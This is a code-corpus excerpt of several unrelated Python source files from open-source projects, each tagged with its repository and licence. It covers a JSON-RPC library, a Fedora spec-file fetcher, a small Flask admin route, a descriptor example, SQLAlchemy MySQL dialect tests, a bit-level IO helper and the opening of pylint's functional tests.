:param config: Request configuration
"""
self.method = method
self.params = []
self.notify = notify
self._config = config
def __call__(self, *args, **kwargs):
"""
Normalizes call parameters
"""
if kwargs and args:
raise ProtocolError(
"JSON-RPC does not support both "
+ "positional and keyword arguments."
)
if kwargs:
self.params = kwargs
else:
self.params = args
def request(self, encoding=None, rpcid=None):
"""
Returns the request object as JSON-formatted string
"""
return dumps(
self.params,
self.method,
version=2.0,
encoding=encoding,
rpcid=rpcid,
notify=self.notify,
config=self._config,
)
def __repr__(self):
"""
String representation
"""
return str(self.request())
def __getattr__(self, method):
"""
Updates the object for a nested call
"""
self.method = "{0}.{1}".format(self.method, method)
return self
class MultiCallNotify(object):
"""
Same as MultiCallMethod but for notifications
"""
def __init__(self, multicall, config=jsonrpclib.config.DEFAULT):
"""
Sets ip the store
:param multicall: The parent MultiCall instance
:param config: Request configuration
"""
self.multicall = multicall
self._config = config
def __getattr__(self, name):
"""
Returns the MultiCallMethod to use as a notification
"""
new_job = MultiCallMethod(name, notify=True, config=self._config)
self.multicall._job_list.append(new_job)
return new_job
class MultiCallIterator(object):
"""
Iterates over the results of a MultiCall.
Exceptions are raised in response to JSON-RPC faults
"""
def __init__(self, results):
"""
Sets up the results store
"""
self.results = results
@staticmethod
def __get_result(item):
"""
Checks for error and returns the "real" result stored in a MultiCall
result.
"""
check_for_errors(item)
return item["result"]
def __iter__(self):
"""
Iterates over all results
"""
for item in self.results:
yield self.__get_result(item)
# Since Python 3.7, we must return instead of raising a StopIteration
# (see PEP-479)
return
def __getitem__(self, i):
"""
Returns the i-th object of the results
"""
return self.__get_result(self.results[i])
def __len__(self):
"""
Returns the number of results stored
"""
return len(self.results)
class MultiCall(object):
"""
server -> a object used to boxcar method calls, where server should be a
ServerProxy object.
Methods can be added to the MultiCall using normal
method call syntax e.g.:
multicall = MultiCall(server_proxy)
multicall.add(2,3)
multicall.get_address("Guido")
To execute the multicall, call the MultiCall object e.g.:
add_result, address = multicall()
"""
def __init__(self, server, config=jsonrpclib.config.DEFAULT):
"""
Sets up the multicall
:param server: A ServerProxy object
:param config: Request configuration
"""
self._server = server
self._job_list = []
self._config = config
def _request(self):
"""
Sends the request to the server and returns the responses
:return: A MultiCallIterator object
"""
if len(self._job_list) < 1:
# Should we alert? This /is/ pretty obvious.
return
request_body = "[ {0} ]".format(
",".join(job.request() for job in self._job_list)
)
responses = self._server._run_request(request_body)
del self._job_list[:]
if not responses:
responses = []
return MultiCallIterator(responses)
@property
def _notify(self):
"""
Prepares a notification call
"""
return MultiCallNotify(self, self._config)
def __getattr__(self, name):
"""
Registers a method call
"""
new_job = MultiCallMethod(name, config=self._config)
self._job_list.append(new_job)
return new_job
__call__ = _request
# These lines conform to xmlrpclib's "compatibility" line.
# Not really sure if we should include these, but oh well.
Server = ServerProxy
# ------------------------------------------------------------------------------
class Fault(object):
"""
JSON-RPC error class
"""
def __init__(
self,
code=-32000,
message="Server error",
rpcid=None,
config=jsonrpclib.config.DEFAULT,
data=None,
):
"""
Sets up the error description
:param code: Fault code
:param message: Associated message
:param rpcid: Request ID
:param config: A JSONRPClib Config instance
:param data: Extra information added to an error description
"""
self.faultCode = code
self.faultString = message
self.rpcid = rpcid
self.config = config
self.data = data
def error(self):
"""
Returns the error as a dictionary
:returns: A {'code', 'message'} dictionary
"""
return {
"code": self.faultCode,
"message": self.faultString,
"data": self.data,
}
def response(self, rpcid=None, version=None):
"""
Returns the error as a JSON-RPC response string
:param rpcid: Forced request ID
:param version: JSON-RPC version
:return: A JSON-RPC response string
"""
if not version:
version = self.config.version
if rpcid:
self.rpcid = rpcid
return dumps(
self,
methodresponse=True,
rpcid=self.rpcid,
version=version,
config=self.config,
)
def dump(self, rpcid=None, version=None):
"""
Returns the error as a JSON-RPC response dictionary
:param rpcid: Forced request ID
:param version: JSON-RPC version
:return: A JSON-RPC response dictionary
"""
if not version:
version = self.config.version
if rpcid:
self.rpcid = rpcid
return dump(
self,
is_response=True,
rpcid=self.rpcid,
version=version,
config=self.config,
)
def __repr__(self):
"""
String representation
"""
return "<Fault {0}: {1}>".format(self.faultCode, self.faultString)
class Payload(object):
"""
JSON-RPC content handler
"""
def __init__(
self, rpcid=None, version=None, config=jsonrpclib.config.DEFAULT
):
"""
Sets up the JSON-RPC handler
:param rpcid: Request ID
:param version: JSON-RPC version
:param config: A JSONRPClib Config instance
"""
if not version:
version = config.version
self.id = rpcid
self.version = float(version)
def request(self, method, params=None):
"""
Prepares a method call request
:param method: Method name
:param params: Method parameters
:return: A JSON-RPC request dictionary
"""
if not isinstance(method, utils.STRING_TYPES):
raise ValueError("Method name must be a string.")
if not self.id:
# Generate a request ID
self.id = str(uuid.uuid4())
request = {"id": self.id, "method": method}
if params or self.version < 1.1:
request["params"] = params or []
if self.version >= 2:
request["jsonrpc"] = str(self.version)
return request
def notify(self, method, params=None):
"""
Prepares a notification request
:param method: Notification name
:param params: Notification parameters
:return: A JSON-RPC notification dictionary
"""
# Prepare the request dictionary
request = self.request(method, params)
# Remove the request ID, as it's a notification
if self.version >= 2:
del request["id"]
else:
request["id"] = None
return request
def response(self, result=None):
"""
Prepares a response dictionary
:param result: The result of method call
:return: A JSON-RPC response dictionary
"""
response = {"result": result, "id": self.id}
if self.version >= 2:
response["jsonrpc"] = str(self.version)
else:
response["error"] = None
return response
def error(self, code=-32000, message="Server error.", data=None):
"""
Prepares an error dictionary
:param code: Error code
:param message: Error message
:param data: Extra data to associate to the error
:return: A JSON-RPC error dictionary
"""
error = self.response()
if self.version >= 2:
del error["result"]
else:
error["result"] = None
error["error"] = {"code": code, "message": message}
if data is not None:
error["error"]["data"] = data
return error
# ------------------------------------------------------------------------------
def dump(
params=None,
methodname=None,
rpcid=None,
version=None,
is_response=None,
is_notify=None,
config=jsonrpclib.config.DEFAULT,
):
"""
Prepares a JSON-RPC dictionary (request, notification, response or error)
:param params: Method parameters (if a method name is given) or a Fault
:param methodname: Method name
:param rpcid: Request ID
:param version: JSON-RPC version
:param is_response: If True, this is a response dictionary
:param is_notify: If True, this is a notification request
:param config: A JSONRPClib Config instance
:return: A JSON-RPC dictionary
"""
# Default version
if not version:
version = config.version
if not is_response and params is None:
params = []
# Validate method name and parameters
valid_params = [utils.TupleType, utils.ListType, utils.DictType, Fault]
if is_response:
valid_params.append(type(None))
if isinstance(methodname, utils.STRING_TYPES) and not isinstance(
params, tuple(valid_params)
):
"""
If a method, and params are not in a listish or a Fault,
error out.
"""
raise TypeError(
"Params must be a dict, list, tuple " "or Fault instance."
)
# Prepares the JSON-RPC content
payload = Payload(rpcid=rpcid, version=version)
if isinstance(params, Fault):
# Prepare an error dictionary
# pylint: disable=E1103
return payload.error(params.faultCode, params.faultString, params.data)
if not isinstance(methodname, utils.STRING_TYPES) and not is_response:
# Neither a request nor a response
raise ValueError(
"Method name must be a string, or is_response "
"must be set to True."
)
if config.use_jsonclass:
# Use jsonclass to convert the parameters
params = jsonclass.dump(params, config=config)
if is_response:
# Prepare a response dictionary
if rpcid is None:
# A response must have a request ID
raise ValueError("A method response must have an rpcid.")
return payload.response(params)
if is_notify:
# Prepare a notification dictionary
return payload.notify(methodname, params)
else:
# Prepare a method call dictionary
return payload.request(methodname, params)
def dumps(
params=None,
methodname=None,
methodresponse=None,
encoding=None,
rpcid=None,
version=None,
notify=None,
config=jsonrpclib.config.DEFAULT,
):
"""
Prepares a JSON-RPC request/response string
:param params: Method parameters (if a method name is given) or a Fault
:param methodname: Method name
:param methodresponse: If True, this is a response dictionary
:param encoding: Result string encoding
:param rpcid: Request ID
:param version: JSON-RPC version
:param notify: If True, this is a notification request
:param config: A JSONRPClib Config instance
:return: A JSON-RPC dictionary
"""
# Prepare the dictionary
request = dump(
params, methodname, rpcid, version, methodresponse, notify, config
)
# Returns it as a JSON string
return jdumps(request, encoding=encoding or "UTF-8")
def load(data, config=jsonrpclib.config.DEFAULT):
"""
Loads a JSON-RPC request/response dictionary. Calls jsonclass to load beans
:param data: A JSON-RPC dictionary
:param config: A JSONRPClib Config instance (or None for default values)
:return: A parsed dictionary or None
"""
if data is None:
# Notification
return None
# if the above raises an error, the implementing server code
# should return something like the following:
# { 'jsonrpc':'2.0', 'error': fault.error(), id: None }
if config.use_jsonclass:
# Convert beans
data = jsonclass.load(data, config.classes)
return data
def loads(data, config=jsonrpclib.config.DEFAULT):
"""
Loads a JSON-RPC request/response string. Calls jsonclass to load beans
:param data: A JSON-RPC string
:param config: A JSONRPClib Config instance (or None for default values)
:return: A parsed dictionary or None
"""
if data == "":
# Notification
return None
# Parse the JSON dictionary
result = jloads(data)
# Load the beans
return load(result, config)
# ------------------------------------------------------------------------------
def check_for_errors(result):
"""
Checks if a result dictionary signals an error
:param result: A result dictionary
:raise TypeError: Invalid parameter
:raise NotImplementedError: Unknown JSON-RPC version
:raise ValueError: Invalid dictionary content
:raise ProtocolError: An error occurred on the server side
:return: The result parameter
"""
if not result:
# Notification
return result
if not isinstance(result, utils.DictType):
# Invalid argument
raise TypeError("Response is not a dict.")
if "jsonrpc" in result and float(result["jsonrpc"]) > 2.0:
# Unknown JSON-RPC version
raise NotImplementedError("JSON-RPC version not yet supported.")
if "result" not in result and "error" not in result:
# Invalid dictionary content
raise ValueError("Response does not have a result or error key.")
if "error" in result and result["error"]:
# Server-side error
if "code" in result["error"]:
# Code + Message
code = result["error"]["code"]
try:
# Get the message (jsonrpclib)
message = result["error"]["message"]
except KeyError:
# Get the trace (jabsorb)
message = result["error"].get("trace", "<no error message>")
if -32700 <= code <= -32000:
# Pre-defined errors
# See http://www.jsonrpc.org/specification#error_object
raise ProtocolError((code, message))
else:
# Application error
data = result["error"].get("data", None)
raise AppError((code, message, data))
elif isinstance(result["error"], dict) and len(result["error"]) == 1:
# Error with a single entry ('reason', ...): use its content
error_key = result["error"].keys()[0]
raise ProtocolError(result["error"][error_key])
else:
# Use the raw error content
raise ProtocolError(result["error"])
return result
def isbatch(request):
"""
Tests if the given request is a batch call, i.e. a list of multiple calls
:param request: a JSON-RPC request object
:return: True if the request is a batch call
"""
if not isinstance(request, (utils.ListType, utils.TupleType)):
# Not a list: not a batch call
return False
elif len(request) < 1:
# Only one request: not a batch call
return False
elif not isinstance(request[0], utils.DictType):
# One of the requests is not a dictionary, i.e. a JSON Object
# therefore it is not a valid JSON-RPC request
return False
elif "jsonrpc" not in request[0].keys():
# No "jsonrpc" version in the JSON object: not a request
return False
try:
version = float(request[0]["jsonrpc"])
except ValueError:
# Bad version of JSON-RPC
raise ProtocolError('"jsonrpc" key must be a float(able) value.')
if version < 2:
# Batch call were not supported before JSON-RPC 2.0
return False
return True
def isnotification(request):
"""
Tests if the given request is a notification
:param request: A request dictionary
:return: True if the request is a notification
"""
if "id" not in request:
# 2.0 notification
return True
if request["id"] is None:
# 1.0 notification
return True
return False
| pymedusa/Medusa | ext/jsonrpclib/jsonrpc.py | Python | gpl-3.0 | 43,868 | 0.000046 |
# ####################################################################
# gofed - set of tools to automize packaging of golang devel codes
# Copyright (C) 2014 Jan Chaloupka, jchaloup@redhat.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
# ####################################################################
###################################################################
# TODO:
# [ ] - detect more import paths/sources in spec file?
# [ ] - detect from %files every build, analyze its content (downloading it from koji by detecting its name
# from spec file => no koji latest-builds, which packages/builds are no arch, which are arch specific (el6 beast)
# [ ] - all provides of source code import must in a form golang(import_path/...)
# [ ] - what files/provides are optional, which should not be in provides (test files, example, ...)
# [ ] - golang imports of examples are optional
###################################################################
import tempfile
from Utils import runCommand
from SpecParser import SpecParser
from Base import Base
class RemoteSpecParser(Base):
def __init__(self, branch, package):
Base.__init__(self)
self.branch = branch
self.package = package
self.sp_obj = None
def parse(self):
f = tempfile.NamedTemporaryFile(delete=True)
cmd_str = "curl http://pkgs.fedoraproject.org/cgit/rpms/%s.git/plain/%s.spec > %s"
runCommand(cmd_str % (self.package, self.package, f.name))
self.sp_obj = SpecParser(f.name)
if not self.sp_obj.parse():
self.err = self.sp_obj.getError()
f.close()
return False
f.close()
return True
def getProvides(self):
"""Fetch a spec file from pkgdb and get provides from all its [sub]packages"""
if self.sp_obj == None:
return {}
return self.sp_obj.getProvides()
def getPackageCommits(self):
if self.sp_obj == None:
return ""
return self.sp_obj.getMacro("commit")
def getPkgURL(self):
if self.sp_obj == None:
return ""
return self.sp_obj.getTag("url")
| ingvagabund/gofed | modules/RemoteSpecParser.py | Python | gpl-2.0 | 2,663 | 0.015396 |
#!/usr/bin/env python
#-*-coding:utf-8-*-
#
# @author Meng G.
# 2016-03-28 restructed
from sqip.config import *
from sqip.libs import *
dashboard = Blueprint('dashboard', __name__, template_folder='templates')
@base.route('/admin/login' , methods=['GET'])
@union_bug
def admin_login():
template = env.get_template('login.html')
return template.render()
@base.route('/admin' , methods=['GET'])
@base.route('/admin/<oath:path>' , methods=['GET'])
@union_bug
def admin():
template = env.get_template('index.html')
return template.render() | gaomeng1900/SQIP-py | sqip/dashboard/dashboard.py | Python | cc0-1.0 | 548 | 0.018248 |
#coding=utf-8
class Quantity:
__counter = 0
def __init__(self):
cls = self.__class__
prefix = cls.__name__
index = cls.__counter
self.storage_name = '_{}#{}'.format(prefix, index)
cls.__counter += 1
def __set__(self, isinstance, value):
if value > 0:
isinstance.__dict__[self.storage_name] = value
else:
raise ValueError('value must be > 0')
class LineItem:
weight = Quantity()
price = Quantity()
def __init__(self, description, weight, price):
self.description = description
self.weight = weight
self.price = price
def subtotal(self):
return self.weight * self.price
| wuqize/FluentPython | chapter20/bulkfood/bulkfood_v3.py | Python | lgpl-3.0 | 720 | 0.005556 |
# coding: utf-8
import datetime
from sqlalchemy import bindparam
from sqlalchemy import Column
from sqlalchemy import DateTime
from sqlalchemy import func
from sqlalchemy import Integer
from sqlalchemy import MetaData
from sqlalchemy import Table
from sqlalchemy import testing
from sqlalchemy.dialects import mysql
from sqlalchemy.engine.url import make_url
from sqlalchemy.testing import engines
from sqlalchemy.testing import eq_
from sqlalchemy.testing import expect_warnings
from sqlalchemy.testing import fixtures
from sqlalchemy.testing import mock
from ...engine import test_execute
class DialectTest(fixtures.TestBase):
__backend__ = True
__only_on__ = "mysql"
@testing.combinations(
(None, "cONnection was kILLEd", "InternalError", "pymysql", True),
(None, "cONnection aLREady closed", "InternalError", "pymysql", True),
(None, "something broke", "InternalError", "pymysql", False),
(2006, "foo", "OperationalError", "mysqldb", True),
(2006, "foo", "OperationalError", "pymysql", True),
(2007, "foo", "OperationalError", "mysqldb", False),
(2007, "foo", "OperationalError", "pymysql", False),
)
def test_is_disconnect(
self, arg0, message, exc_cls_name, dialect_name, is_disconnect
):
class Error(Exception):
pass
dbapi = mock.Mock()
dbapi.Error = Error
dbapi.ProgrammingError = type("ProgrammingError", (Error,), {})
dbapi.OperationalError = type("OperationalError", (Error,), {})
dbapi.InterfaceError = type("InterfaceError", (Error,), {})
dbapi.InternalError = type("InternalError", (Error,), {})
dialect = getattr(mysql, dialect_name).dialect(dbapi=dbapi)
error = getattr(dbapi, exc_cls_name)(arg0, message)
eq_(dialect.is_disconnect(error, None, None), is_disconnect)
def test_ssl_arguments_mysqldb(self):
from sqlalchemy.dialects.mysql import mysqldb
dialect = mysqldb.dialect()
self._test_ssl_arguments(dialect)
def test_ssl_arguments_oursql(self):
from sqlalchemy.dialects.mysql import oursql
dialect = oursql.dialect()
self._test_ssl_arguments(dialect)
def _test_ssl_arguments(self, dialect):
kwarg = dialect.create_connect_args(
make_url(
"mysql://scott:tiger@localhost:3306/test"
"?ssl_ca=/ca.pem&ssl_cert=/cert.pem&ssl_key=/key.pem"
)
)[1]
# args that differ among mysqldb and oursql
for k in ("use_unicode", "found_rows", "client_flag"):
kwarg.pop(k, None)
eq_(
kwarg,
{
"passwd": "tiger",
"db": "test",
"ssl": {
"ca": "/ca.pem",
"cert": "/cert.pem",
"key": "/key.pem",
},
"host": "localhost",
"user": "scott",
"port": 3306,
},
)
@testing.combinations(
("compress", True),
("connect_timeout", 30),
("read_timeout", 30),
("write_timeout", 30),
("client_flag", 1234),
("local_infile", 1234),
("use_unicode", False),
("charset", "hello"),
)
def test_normal_arguments_mysqldb(self, kwarg, value):
from sqlalchemy.dialects.mysql import mysqldb
dialect = mysqldb.dialect()
connect_args = dialect.create_connect_args(
make_url(
"mysql://scott:tiger@localhost:3306/test"
"?%s=%s" % (kwarg, value)
)
)
eq_(connect_args[1][kwarg], value)
def test_mysqlconnector_buffered_arg(self):
from sqlalchemy.dialects.mysql import mysqlconnector
dialect = mysqlconnector.dialect()
kw = dialect.create_connect_args(
make_url("mysql+mysqlconnector://u:p@host/db?buffered=true")
)[1]
eq_(kw["buffered"], True)
kw = dialect.create_connect_args(
make_url("mysql+mysqlconnector://u:p@host/db?buffered=false")
)[1]
eq_(kw["buffered"], False)
kw = dialect.create_connect_args(
make_url("mysql+mysqlconnector://u:p@host/db")
)[1]
eq_(kw["buffered"], True)
def test_mysqlconnector_raise_on_warnings_arg(self):
from sqlalchemy.dialects.mysql import mysqlconnector
dialect = mysqlconnector.dialect()
kw = dialect.create_connect_args(
make_url(
"mysql+mysqlconnector://u:p@host/db?raise_on_warnings=true"
)
)[1]
eq_(kw["raise_on_warnings"], True)
kw = dialect.create_connect_args(
make_url(
"mysql+mysqlconnector://u:p@host/db?raise_on_warnings=false"
)
)[1]
eq_(kw["raise_on_warnings"], False)
kw = dialect.create_connect_args(
make_url("mysql+mysqlconnector://u:p@host/db")
)[1]
assert "raise_on_warnings" not in kw
@testing.only_on("mysql")
def test_random_arg(self):
dialect = testing.db.dialect
kw = dialect.create_connect_args(
make_url("mysql://u:p@host/db?foo=true")
)[1]
eq_(kw["foo"], "true")
@testing.only_on("mysql")
@testing.skip_if("mysql+mysqlconnector", "totally broken for the moment")
@testing.fails_on("mysql+oursql", "unsupported")
def test_special_encodings(self):
for enc in ["utf8mb4", "utf8"]:
eng = engines.testing_engine(
options={"connect_args": {"charset": enc, "use_unicode": 0}}
)
conn = eng.connect()
eq_(conn.dialect._connection_charset, enc)
def test_no_show_variables(self):
from sqlalchemy.testing import mock
engine = engines.testing_engine()
def my_execute(self, statement, *args, **kw):
if statement.startswith("SHOW VARIABLES"):
statement = "SELECT 1 FROM DUAL WHERE 1=0"
return real_exec(self, statement, *args, **kw)
real_exec = engine._connection_cls.exec_driver_sql
with mock.patch.object(
engine._connection_cls, "exec_driver_sql", my_execute
):
with expect_warnings(
"Could not retrieve SQL_MODE; please ensure the "
"MySQL user has permissions to SHOW VARIABLES"
):
engine.connect()
def test_no_default_isolation_level(self):
from sqlalchemy.testing import mock
engine = engines.testing_engine()
real_isolation_level = testing.db.dialect.get_isolation_level
def fake_isolation_level(connection):
connection = mock.Mock(
cursor=mock.Mock(
return_value=mock.Mock(
fetchone=mock.Mock(return_value=None)
)
)
)
return real_isolation_level(connection)
with mock.patch.object(
engine.dialect, "get_isolation_level", fake_isolation_level
):
with expect_warnings(
"Could not retrieve transaction isolation level for MySQL "
"connection."
):
engine.connect()
def test_autocommit_isolation_level(self):
c = testing.db.connect().execution_options(
isolation_level="AUTOCOMMIT"
)
assert c.exec_driver_sql("SELECT @@autocommit;").scalar()
c = c.execution_options(isolation_level="READ COMMITTED")
assert not c.exec_driver_sql("SELECT @@autocommit;").scalar()
def test_isolation_level(self):
values = [
"READ UNCOMMITTED",
"READ COMMITTED",
"REPEATABLE READ",
"SERIALIZABLE",
]
for value in values:
c = testing.db.connect().execution_options(isolation_level=value)
eq_(testing.db.dialect.get_isolation_level(c.connection), value)
class ParseVersionTest(fixtures.TestBase):
@testing.combinations(
((10, 2, 7), "10.2.7-MariaDB", (10, 2, 7, "MariaDB"), True),
(
(10, 2, 7),
"5.6.15.10.2.7-MariaDB",
(5, 6, 15, 10, 2, 7, "MariaDB"),
True,
),
((10, 2, 10), "10.2.10-MariaDB", (10, 2, 10, "MariaDB"), True),
((5, 7, 20), "5.7.20", (5, 7, 20), False),
((5, 6, 15), "5.6.15", (5, 6, 15), False),
(
(10, 2, 6),
"10.2.6.MariaDB.10.2.6+maria~stretch-log",
(10, 2, 6, "MariaDB", 10, 2, "6+maria~stretch", "log"),
True,
),
(
(10, 1, 9),
"10.1.9-MariaDBV1.0R050D002-20170809-1522",
(10, 1, 9, "MariaDB", "V1", "0R050D002", 20170809, 1522),
True,
),
)
def test_mariadb_normalized_version(
self, expected, raw_version, version, is_mariadb
):
dialect = mysql.dialect()
eq_(dialect._parse_server_version(raw_version), version)
dialect.server_version_info = version
eq_(dialect._mariadb_normalized_version_info, expected)
assert dialect._is_mariadb is is_mariadb
@testing.combinations(
(True, (10, 2, 7, "MariaDB")),
(True, (5, 6, 15, 10, 2, 7, "MariaDB")),
(False, (10, 2, 10, "MariaDB")),
(False, (5, 7, 20)),
(False, (5, 6, 15)),
(True, (10, 2, 6, "MariaDB", 10, 2, "6+maria~stretch", "log")),
)
def test_mariadb_check_warning(self, expect_, version):
dialect = mysql.dialect()
dialect.server_version_info = version
if expect_:
with expect_warnings(
".*before 10.2.9 has known issues regarding "
"CHECK constraints"
):
dialect._warn_for_known_db_issues()
else:
dialect._warn_for_known_db_issues()
class RemoveUTCTimestampTest(fixtures.TablesTest):
"""This test exists because we removed the MySQL dialect's
override of the UTC_TIMESTAMP() function, where the commit message
for this feature stated that "it caused problems with executemany()".
Since no example was provided, we are trying lots of combinations
here.
[ticket:3966]
"""
__only_on__ = "mysql"
__backend__ = True
@classmethod
def define_tables(cls, metadata):
Table(
"t",
metadata,
Column("id", Integer, primary_key=True),
Column("x", Integer),
Column("data", DateTime),
)
Table(
"t_default",
metadata,
Column("id", Integer, primary_key=True),
Column("x", Integer),
Column("idata", DateTime, default=func.utc_timestamp()),
Column("udata", DateTime, onupdate=func.utc_timestamp()),
)
def test_insert_executemany(self):
with testing.db.connect() as conn:
conn.execute(
self.tables.t.insert().values(data=func.utc_timestamp()),
[{"x": 5}, {"x": 6}, {"x": 7}],
)
def test_update_executemany(self):
with testing.db.connect() as conn:
timestamp = datetime.datetime(2015, 4, 17, 18, 5, 2)
conn.execute(
self.tables.t.insert(),
[
{"x": 5, "data": timestamp},
{"x": 6, "data": timestamp},
{"x": 7, "data": timestamp},
],
)
conn.execute(
self.tables.t.update()
.values(data=func.utc_timestamp())
.where(self.tables.t.c.x == bindparam("xval")),
[{"xval": 5}, {"xval": 6}, {"xval": 7}],
)
def test_insert_executemany_w_default(self):
with testing.db.connect() as conn:
conn.execute(
self.tables.t_default.insert(), [{"x": 5}, {"x": 6}, {"x": 7}]
)
def test_update_executemany_w_default(self):
with testing.db.connect() as conn:
timestamp = datetime.datetime(2015, 4, 17, 18, 5, 2)
conn.execute(
self.tables.t_default.insert(),
[
{"x": 5, "idata": timestamp},
{"x": 6, "idata": timestamp},
{"x": 7, "idata": timestamp},
],
)
conn.execute(
self.tables.t_default.update()
.values(idata=func.utc_timestamp())
.where(self.tables.t_default.c.x == bindparam("xval")),
[{"xval": 5}, {"xval": 6}, {"xval": 7}],
)
class SQLModeDetectionTest(fixtures.TestBase):
__only_on__ = "mysql"
__backend__ = True
def _options(self, modes):
def connect(con, record):
cursor = con.cursor()
cursor.execute("set sql_mode='%s'" % (",".join(modes)))
e = engines.testing_engine(
options={
"pool_events": [
(connect, "first_connect"),
(connect, "connect"),
]
}
)
return e
def test_backslash_escapes(self):
engine = self._options(["NO_BACKSLASH_ESCAPES"])
c = engine.connect()
assert not engine.dialect._backslash_escapes
c.close()
engine.dispose()
engine = self._options([])
c = engine.connect()
assert engine.dialect._backslash_escapes
c.close()
engine.dispose()
def test_ansi_quotes(self):
engine = self._options(["ANSI_QUOTES"])
c = engine.connect()
assert engine.dialect._server_ansiquotes
c.close()
engine.dispose()
def test_combination(self):
engine = self._options(["ANSI_QUOTES,NO_BACKSLASH_ESCAPES"])
c = engine.connect()
assert engine.dialect._server_ansiquotes
assert not engine.dialect._backslash_escapes
c.close()
engine.dispose()
class ExecutionTest(fixtures.TestBase):
"""Various MySQL execution special cases."""
__only_on__ = "mysql"
__backend__ = True
def test_charset_caching(self):
engine = engines.testing_engine()
cx = engine.connect()
meta = MetaData()
charset = engine.dialect._detect_charset(cx)
meta.reflect(cx)
eq_(cx.dialect._connection_charset, charset)
cx.close()
def test_sysdate(self):
d = testing.db.scalar(func.sysdate())
assert isinstance(d, datetime.datetime)
class AutocommitTextTest(test_execute.AutocommitTextTest):
__only_on__ = "mysql"
def test_load_data(self):
self._test_keyword("LOAD DATA STUFF")
def test_replace(self):
self._test_keyword("REPLACE THING")
| graingert/sqlalchemy | test/dialect/mysql/test_dialect.py | Python | mit | 14,932 | 0 |
# @source http://rosettacode.org/wiki/Bitwise_IO#Python
# @license http://www.gnu.org/licenses/fdl-1.2.html
import logging
logger = logging.getLogger('naabal.util.bitio')
class BitIO(object):
BITS_IN_BYTE = 8
DEFAULT_MASK = 1 << (BITS_IN_BYTE - 1) # 0x80
def __init__(self, handle):
self._data_buffer = handle
self._bit_buffer = 0x00
self._bit_mask = self.DEFAULT_MASK
self._bit_idx = 0
def __enter__(self):
return self
def __exit__(self, type, value, tb):
pass
@property
def index(self):
return self._bit_idx
class BitWriter(BitIO):
def __exit__(self, type, value, tb):
self.flush()
def write_bit(self, bit):
if bit:
self._bit_buffer |= self._bit_mask
self._bit_mask = self._bit_mask >> 1
if self._bit_mask == 0:
self._flush_bit_buffer()
self._reset_state()
def write_bits(self, value, bit_count):
mask = 1 << (bit_count - 1)
while mask != 0:
if mask & value:
self._bit_buffer |= self._bit_mask
self._bit_mask = self._bit_mask >> 1
if self._bit_mask == 0:
self._flush_bit_buffer()
self._reset_state()
mask = mask >> 1
def flush(self):
if self._bit_mask != self.DEFAULT_MASK:
self._flush_bit_buffer()
self._reset_state()
return self._bit_idx
def _flush_bit_buffer(self):
self._data_buffer.write(chr(self._bit_buffer))
self._bit_idx += 1
def _reset_state(self):
self._bit_buffer = 0x00
self._bit_mask = self.DEFAULT_MASK
class BitReader(BitIO):
def read_bit(self):
if self._bit_mask == self.DEFAULT_MASK:
self._load_bit_buffer()
value = self._bit_buffer & self._bit_mask
self._bit_mask = self._bit_mask >> 1
if self._bit_mask == 0:
self._bit_mask = self.DEFAULT_MASK
return 1 if value else 0
def read_bits(self, bit_count):
mask = 1 << (bit_count - 1)
bits_value = 0x00
while mask != 0:
if self._bit_mask == self.DEFAULT_MASK:
self._load_bit_buffer()
if self._bit_buffer & self._bit_mask:
bits_value |= mask
mask = mask >> 1
self._bit_mask = self._bit_mask >> 1
if self._bit_mask == 0:
self._bit_mask = self.DEFAULT_MASK
return bits_value
def _load_bit_buffer(self):
c = self._data_buffer.read(1)
if c:
self._bit_buffer = ord(c)
self._bit_idx += 1
else:
raise IOError('Attempted to read past EOF')
| aheadley/python-naabal | naabal/util/bitio.py | Python | mit | 2,763 | 0.002533 |
# Copyright (c) 2003-2008 LOGILAB S.A. (Paris, FRANCE).
# http://www.logilab.fr/ -- mailto:contact@logilab.fr
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation; either version 2 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
"""functional/non regression tests for pylint"""
import unittest
import sys
import re
import new
from os import linesep
from os.path import exists
from logilab.common import testlib
from utils import get_tests_info, fix_path, TestReporter
from logilab.astng import MANAGER
from pylint.lint import PyLinter
from pylint import checkers
test_reporter = TestReporter()
linter = PyLinter()
linter.set_reporter(test_reporter)
linter.config.persistent = 0
checkers.initialize(linter)
linter.global_set_option('required-attributes', ('__revision__',))
PY23 = sys.version_info >= (2, 3)
PY24 = sys.version_info >= (2, 4)
PY25 = sys.version_info >= (2, 5)
if linesep != '\n':
LINE_RGX = re.compile(linesep)
def ulines(string):
return LINE_RGX.sub('\n', string)
else:
def ulines(string):
return string
INFO_TEST_RGX = re.compile('^func_i\d\d\d\d$')
def exception_str(ex):
"""function used to replace default __str__ method of exception instances"""
return 'in %s\n:: %s' % (ex.file, ', '.join(ex.args))
class LintTestUsingModule(testlib.TestCase):
DEFAULT_PACKAGE = 'input'
package = DEFAULT_PACKAGE
linter = linter
module = None
depends = None
_TEST_TYPE = 'module'
def shortDescription(self):
values = { 'mode' : self._TEST_TYPE,
'input': self.module,
'pkg': self.package,
'cls': self.__class__.__name__}
if self.package == self.DEFAULT_PACKAGE:
msg = '%(mode)s test of input file "%(input)s" (%(cls)s)'
else:
msg = '%(mode)s test of input file "%(input)s" in "%(pkg)s" (%(cls)s)'
return msg % values
def test_functionality(self):
tocheck = [self.package+'.'+self.module]
if self.depends:
tocheck += [self.package+'.%s' % name.replace('.py', '')
for name, file in self.depends]
self._test(tocheck)
def _test(self, tocheck):
if INFO_TEST_RGX.match(self.module):
self.linter.enable_message_category('I')
else:
self.linter.disable_message_category('I')
try:
self.linter.check(tocheck)
except Exception, ex:
# need finalization to restore a correct state
self.linter.reporter.finalize()
ex.file = tocheck
ex.__str__ = new.instancemethod(exception_str, ex, None)
raise
